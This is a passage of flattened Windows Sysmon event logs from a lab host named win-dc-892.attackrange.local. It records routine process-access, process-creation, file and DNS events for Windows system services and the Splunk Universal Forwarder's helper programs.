Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.353{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.353{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.338{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.338{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 
10341000x80000000000000008653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.338{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.338{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.011{266CAFBE-64C4-6064-9B00-00000000AE01}4924ATTACKRANGE\AdministratorC:\Windows\System32\RuntimeBroker.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.dbMD5=F07609C102FE3E5BB73F94C058C36A3E,SHA256=C30F275A0D0A518231316A9E8EF8EC9502369C28CAAE0A71496B12996E8BC10E,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000008680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.881{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.881{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000008678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.689{266CAFBE-64F5-6064-0301-00000000AE01}6500win-dc-892.attackrange.local010.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000008677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.523{266CAFBE-64FB-6064-0E01-00000000AE01}64206408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FB-6064-0E01-00000000AE01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:07.351{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:07.351{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64FB-6064-0E01-00000000AE01}6420C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FB-6064-0E01-00000000AE01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.352{266CAFBE-64FB-6064-0E01-00000000AE01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:08.973{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:08.973{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.833{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.333{266CAFBE-64FC-6064-0F01-00000000AE01}62002460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FC-6064-0F01-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
